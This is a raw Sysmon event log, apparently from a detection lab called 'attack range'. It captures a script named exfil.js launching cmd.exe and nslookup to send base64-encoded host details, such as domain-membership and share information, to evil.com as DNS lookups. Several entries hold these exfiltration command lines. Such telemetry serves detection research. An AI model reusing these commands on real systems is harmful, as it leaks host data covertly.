14:21:33.981{2E1864BB-18E0-629A-6742-000000005F02}39766168C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-F943-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.986{2E1864BB-18ED-629A-F943-000000005F02}6660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlovrd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.981{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlybqzo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.960{2E1864BB-18ED-629A-F743-000000005F02}9082604C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F843-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.944{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F843-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.944{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.944{2E1864BB-18ED-629A-F643-000000005F02}47846028C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-F843-000000005F02}6856C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.956{2E1864BB-18ED-629A-F843-000000005F02}6856C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-F643-000000005F02}4784C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlybqzo.tmp 2>&1 10341000x8000000000000000209710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.928{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-F743-000000005F02}908C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.928{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-F743-000000005F02}908C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.928{2E1864BB-18ED-629A-F743-000000005F02}9082604C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F643-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.928{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F743-000000005F02}908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F643-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-18E0-629A-6742-000000005F02}39764248C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-F643-000000005F02}4784C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.923{2E1864BB-18ED-629A-F643-000000005F02}4784C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlybqzo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.913{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlzxn.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-18ED-629A-F443-000000005F02}16922516C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-F543-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F543-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.882{2E1864BB-18ED-629A-F343-000000005F02}25122236C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-F543-000000005F02}7556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.892{2E1864BB-18ED-629A-F543-000000005F02}7556C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-F343-000000005F02}2512C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzxn.tmp 2>&1 10341000x8000000000000000209690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 